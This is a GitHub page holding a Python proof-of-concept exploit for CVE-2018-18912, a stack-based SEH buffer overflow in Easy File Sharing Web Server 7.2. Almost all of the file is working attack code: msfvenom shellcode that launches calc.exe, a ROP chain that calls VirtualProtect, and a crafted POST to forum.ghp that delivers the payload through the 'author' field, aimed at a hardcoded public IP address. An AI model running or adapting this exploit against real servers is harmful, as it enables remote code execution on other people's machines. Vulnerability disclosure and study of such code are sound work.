Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-s/CVE-2018-18912.py /
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
199 lines (173 sloc)
6.07 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Easy File Sharing Web Server 7.2 - 'author' Remote Buffer Overflow (SEH) | |
| # Date: November 5, 2018 | |
| # Exploit Author: Kristijan Antic | |
| # Vendor Homepage: http://www.sharing-file.com/ | |
| # Software Link: http://www.sharing-file.com/efssetup.exe | |
| # Version: 7.2 | |
| # Tested on: Windows 10.0.17134 x64 | |
| # CVE : CVE-2018-18912 | |
| # 1. Description: An issue was discovered in Easy File Sharing (EFS) Web Server 7.2, | |
| # A stack-based buffer overflow vulnerability occurs when an authenticated user sends | |
| # a malicious POST request to forum.ghp upon creating a new topic in | |
| # the forums, which allows remote attackers to execute arbitrary code. | |
| # 2. Proof of Concept | |
| import socket | |
| import struct | |
| HOST = '81.82.253.190' | |
| PORT = 81 | |
| def p32(v): | |
| return struct.pack("<L", v) | |
| def send_malformed_buffer(data): | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect((HOST, PORT)) | |
| s.send(data) | |
| s.close() | |
| #msfvenom.bat -p windows/exec cmd=calc.exe -b '\xff\x2c\x00\x7e\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x3d\x25\x2b\x26' -v shellcode -f python | |
| shellcode = "" | |
| shellcode += "\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73" | |
| shellcode += "\x13\x90\xaa\xb9\xe4\x83\xeb\xfc\xe2\xf4\x6c\x42" | |
| shellcode += "\x3b\xe4\x90\xaa\xd9\x6d\x75\x9b\x79\x80\x1b\xfa" | |
| shellcode += "\x89\x6f\xc2\xa6\x32\xb6\x84\x21\xcb\xcc\x9f\x1d" | |
| shellcode += "\xf3\xc2\xa1\x55\x15\xd8\xf1\xd6\xbb\xc8\xb0\x6b" | |
| shellcode += "\x76\xe9\x91\x6d\x5b\x16\xc2\xfd\x32\xb6\x80\x21" | |
| shellcode += "\xf3\xd8\x1b\xe6\xa8\x9c\x73\xe2\xb8\x35\xc1\x21" | |
| shellcode += "\xe0\xc4\x91\x79\x32\xad\x88\x49\x83\xad\x1b\x9e" | |
| shellcode += "\x32\xe5\x46\x9b\x46\x48\x51\x65\xb4\xe5\x57\x92" | |
| shellcode += "\x59\x91\x66\xa9\xc4\x1c\xab\xd7\x9d\x91\x74\xf2" | |
| shellcode += "\x32\xbc\xb4\xab\x6a\x82\x1b\xa6\xf2\x6f\xc8\xb6" | |
| shellcode += "\xb8\x37\x1b\xae\x32\xe5\x40\x23\xfd\xc0\xb4\xf1" | |
| shellcode += "\xe2\x85\xc9\xf0\xe8\x1b\x70\xf5\xe6\xbe\x1b\xb8" | |
| shellcode += "\x52\x69\xcd\xc0\xb8\x69\x15\x18\xb9\xe4\x90\xfa" | |
| shellcode += "\xd1\xd5\x1b\xc5\x3e\x1b\x45\x11\x49\x51\x32\xfc" | |
| shellcode += "\xd1\x42\x05\x17\x24\x1b\x45\x96\xbf\x98\x9a\x2a" | |
| shellcode += "\x42\x04\xe5\xaf\x02\xa3\x83\xd8\xd6\x8e\x90\xf9" | |
| shellcode += "\x46\x31\xf3\xcb\xd5\x87\xbe\xcf\xc1\x81\x90\xaa" | |
| shellcode += "\xb9\xe4" | |
| # ---====GADGETS====--- | |
| ropnop = 0x1001a858 | |
| pop_eax_retn = 0x10015442 | |
| stack_pivot_addr = 0x10022869 | |
| pop_esi_retn = 0x1001c8e4 | |
| pop_ebx_retn = 0x10012F3C | |
| pop_ecx_retn = 0x1001FC4C | |
| neg_eax_retn = 0x100231cd | |
| add_ebx_eax = 0x1001DA09 | |
| pop_edi_retn = 0x1001A648 | |
| xor_edx_edx = 0x10022C4C | |
| inc_edx = 0x61c059a0 | |
| pop_ebp_retn = 0x1001add7 | |
| push_esp_retn = 0x61c24169 | |
| pushad_retn = 0x100240c2 | |
| ropchain = '' | |
| buff = 'A' * 64 | |
| buff += 'BBBB' #nseh | |
| buff += struct.pack("<L", stack_pivot_addr) #handler | |
| buff += 'F' * 2348 | |
| ropchain += p32(pop_eax_retn) | |
| ropchain += p32(0x61c832d0) #need to deref | |
| ropchain += p32(0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] | |
| ropchain += p32(0x61c18d81) | |
| ropchain += p32(0x1001d626) | |
| ropchain += p32(0x10021a3e) | |
| #EBP = ReturnTo() rop gadget to push esp ret | |
| ropchain += p32(pop_ebp_retn) | |
| ropchain += p32(push_esp_retn) | |
| #EDX = NewProtect(0x40) | |
| ropchain += p32(xor_edx_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| ropchain += p32(inc_edx) | |
| #ECX = lpOldProtect (ptr to writable address address) | |
| ropchain += p32(pop_ecx_retn) | |
| ropchain += p32(0x61c730ad) | |
| #EBX = dwSize() | |
| ropchain += p32(pop_eax_retn) | |
| ropchain += p32(0xFFFFFFFE) | |
| ropchain += p32(neg_eax_retn) | |
| ropchain += p32(add_ebx_eax) | |
| #EDI = ROP NOP | |
| ropchain += p32(pop_edi_retn) | |
| ropchain += p32(ropnop) | |
| #EAX = NOP (0x90909090) | |
| ropchain += p32(pop_eax_retn) | |
| ropchain += p32(0x10027010) #will inc one byte at this addr | |
| ropchain += p32(pop_eax_retn) | |
| ropchain += p32(0x90909090) | |
| #PUSAH | |
| ropchain += p32(pushad_retn) | |
| ropchain += '\x90' * 4 | |
| ropchain += shellcode | |
| buff += ropchain | |
| request = '' | |
| request += "POST /forum.ghp?forumid=1 HTTP/1.1\r\n" | |
| request += "Host: 192.168.184.1\r\n" | |
| request += "Content-Type: application/x-www-form-urlencoded\r\n" | |
| request += "User-Agent: Mozilla/5.0\r\n" | |
| request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n" | |
| request += "Accept-Language: en-US,en;q=0.9\r\n" | |
| request += "Cookie: UserID=hacker; PassWD=hacker; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201; SESSIONID=14677\r\n" | |
| request += "Connection: close\r\n" | |
| request += "\r\n" | |
| request += "author="+buff+"&passwd=hacker&title=bbbb&content=ffff&Submit=Submit\r\n" | |
| send_malformed_buffer(request) |